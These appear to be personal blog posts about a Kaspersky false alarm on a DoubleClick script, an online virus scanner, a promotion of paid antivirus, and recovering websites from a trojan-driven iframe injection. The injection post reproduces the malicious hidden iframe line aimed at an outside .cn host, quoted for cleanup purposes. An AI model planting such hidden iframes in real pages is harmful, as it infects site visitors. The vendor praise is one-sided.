What is http://googleads.g.doubleclick.net/pagead/test_domain.js ?

I was getting Kaspersky Security Alert as stated below everytime I browse website's with Google Adsense Content Advertisement in it.

"Application Google Chrome contains link to web page http://googleads.g.doubleclick.net/pagead/test_domain.js used to steal password, credit card number or other confidential data. Denied"

So, got bit worried whether this virus threat was a real threat or a false alert , so just browse the Net to find out more about googleads.g.doubleclick.net

Found out that there is nothing to worry about, as Google bought DoubleClick in 2007 they have some integration things to sort out and there is no harm.

To confirm the status, I sent an email to Kaspersky Virus Lab as stated below and the Virus analyst confirmed it was a false alarm.

newvirus[at]kaspersky[dot]com Mon, Nov 23, 2009 at 2:50 AM

To: Me
Hello,

Sorry, it was a false detection. It will be fixed in the next update.
Thank you for your help.

>
> LANG: en
> email: Me
> product: Kaspersky Internet Security 8.0.0.506
> viruses_date: Today
>
> description:
> I am getting Kaspersky Security Alert everytime i browse a website with google adsense code it. It is giving the following alert. How do I solve this problem? I have attached the screen shot of the alert.
>
> 11/23/2009 1:47:58 AM?http://googleads.g.doubleclick.net/pagead/test_domain.js?C:\Program Files\MOZILLA FIREFOX\?FIREFOX.EXE?532?"C:\Program Files\Mozilla Firefox\firefox.exe" ?Detected: googleads.g.doubleclick.net/*?Databases
>
> uploaded files:
> kaspersky-security-alert.jpg
>
>
--------------------
Regards,
Virus analyst, Kaspersky Lab.

How to scan a file for virus without an anti virus software.

You just downloaded a file from the Internet but don't have a paid anti virus software to check the file for any virus.

One way to check the file for any virus and be certain that the file is not malicious is to use Kaspersky Online Scanner.

Open your browser Mozilla , IE or Google Chrome.

Go to http://support.kaspersky.com/viruses/online

Click Choose File. Select the file you want to check and and the click Submit button.

Once you have click the submit button, the suspected file will be uploaded from your computer to a special server and scanned using Kaspersky Anti-Virus.

It has exceptional virus detection level and it's virus database pattern is updated every three hours.

Wait for few moment. Kaspersky Online Scanner will produce the result whether the file is infected or not.

The only limitation for this facility is that you can check file with file size less than 1 MB at any one time.

If you have few files then create an archive file (in zip, arj or similar format) with file size less than 1 MB and submit the archive file.

Buy A Paid Antivirus Software to protect your information.

Last time I was using one of the best free antivirus, but it failed to protect my computer from Trojan virus and phishing sites.

I was using free antivirus, free anti malware and spyware software.

My personal computer got infected and this virus damaged most of my website and my client website.

If you pc is infected, your pc's cpu usage will always be high even when you not doing anything much or run a lot of program.

In addition, your out going traffic will be higher that normal. It is sending information to the hacker and for my case the trojan was accessing my website and causing iframe injection.

Layman terms, my web pages got corrupted.

Buy a good paid antivirus, you will have some peace of mind and they will provide technical support to detect any virus that might reside in your pc.

I am using Kaspersky Internet Security for my laptop and desktop, please refer to this article for their support in solving my virus problem.

After using Kaspersky and cleaning my pc from any virus.

Thank God, it didn't recur back.

Plus, I don't some other measures to protect my pc and additional precaution when accessing my website using latest ftp software.

I am getting protection cybercriminals and it protects my pc while I am surfing the internet.

Few month back, I was active in Traffic Exchange sites to promote my affiliate marketing, while surfing Kaspersky managed to block my pc from being infected with Trojan and other malwares.


Other protections that you will get are as follows for Kaspersky Internet Security

1. It keeps your money and identity safe. Always clear your cache and cookies after making any financial transaction via Internet.

2. Protects against bank account fraud. It protects your from phishing sites, please click here for more details about phishing.

3. Safeguards against online shopping threats.

4. Cybercriminals won’t hi-jack your PC, you pc will not be hijacked and turn to a zombie machine.

5. Once hijack hackers can easily read your key board key stroke and create a financial havoc for you.

6. Family protection from on-line predators.

7. Your files won’t be ruined by hackers or like me when I make ftp connection it is much more secure now.

8. Keeps your PC running smoothly.

How to solve an iframe injection caused by Trojan malware

How to solve an iframe injection caused by Trojan malware

What is IFRAME?

The iframe tag defines an inline frame that contains another document. We use iframe tag to include another document in inside website document.

For example, I use the following iframe code to insert Salesforce.com content syndicate inside my website. Please refer to the image below.

iframe id="blockrandom"

name="iframe" src="http://probyte2u.com/salesforce.html"

width="100%"

height="1300"

scrolling="auto"

align="top"

frameborder="0"

class="wrapper">

This option will not work correctly. Unfortunately, your browser does not support inline frames.

/iframe

Basically now you have some rough idea about IFRAME and it's usage !

Now what does IFRAME injection means ?

Iframe injections means attackers or hackers insert their iframe codes inside your website page. They use Trojan malware to do it.

Normally their will target your index.html, index.php, default.php or configuration.php page.

They will insert their codes inside your website, so when visitors visit your page they will download their malicious code inside your personal computer in order to replicate the process and also to retrieve financial and identification details of the visitor.

Their main purpose is for financial gain and some of them use it for their political purpose. They can also infect a lot of pc and use it to launch Distributed Denial of Service (DDoS) attack against their target.

From my own personal experience, I first encounter this problem when I tried to access my website and got the following error.

Parse error: syntax error, unexpected '/' in /home/+++++/public_html/index.php on line 85

So I checked in the index.php file and found the following code inserted inside the index.php file.

The iframe injection was not properly done, with additional "/" symbol at the start of the iframe injection as shown below, it was detected and the website coding does not download malicious code.

/

iframe src="http://{URL HAS BEEN REMOVED}.cn:8080/ts/in.cgi?pepsi49" width=125 height=125 style="visibility: hidden"

If the iframe injection was done properly, then all the visitors that visit the infected site will most probably get infected with malicious malware.

Sample of Mozilla Warning for Reported Attack Site shown below.

So what i did was that I removed the iframe injection from the infected file and upload the new files. Plus, I change ftp details for the website.

My site was safe for few days, unfortanely the same problem occurs after a while. I was suspucios how the hacker able to access my website.

So I checked with my hosting provider how my website was hacked.

Then only I knew that my personal computer was most probably infected by Trojan virus and the hacker has automated the whole process.

The Trojan virus managed to steal all my websites username and password that was saved in the file transfer protocal software that I used. All the websites that I used using the ftp software was infected with the iframe injection.

Luckily, I got back up files for my website that was not infected.

Since a lot of the files has been infected, I had no other choise but to restore the entire site using the backup file. I changed my ftp username and password.

To prevent the problem from recurring I install Kaspersky Internet Security and no more iframe injection problem

My root cause of my problem was that my Antivirus (Free Version) couldn't detect the Trojan at all.

If your problem is not as serious as mine.

Then you could resolve the problem using the steps below.

How to eliminate this problem

Use Kapersky Antivirus paid version , update the pattern and scan your computer. Clean all infected files in your computer.

How to clean the infected php or html pages in my web site?

1. Refer to Google badaware notice like this

Approximately 6 files have been injected. You can search your index.php, index.html for the lines of codes.

You can also download copies of your public_html if the injected files are too many (zip the public_html or folder by folders. Uncompress the zip file on your desktop. Kapersky will notify you the injected files. Do not clean the files. Just save the log file so you can edit manually. Using this method, your page will not be destroyed or altered by Kapersky.

2. Change your FTP/Cpanel Login information. Avoid using the same password for web registration. Your FTP password should not be recycled. Some fake web sites would harvest this information and perform iframe injection over the web.

3. Sort your files by dates in FTP window. You can check the latest edited pages (or infection date) for injected codes.

4. You can revert to public_html backup – this method is not advisable and should be used as last resort if you could not find the infected pages. If your pages have been infected for more than a month, most probably your backup files also contain the injected codes.

5. Plus remember not to safe the username and password of your website inside your file transfer protocal software. From my own experience, the Trojan virus managed to steal the information from the ftp software.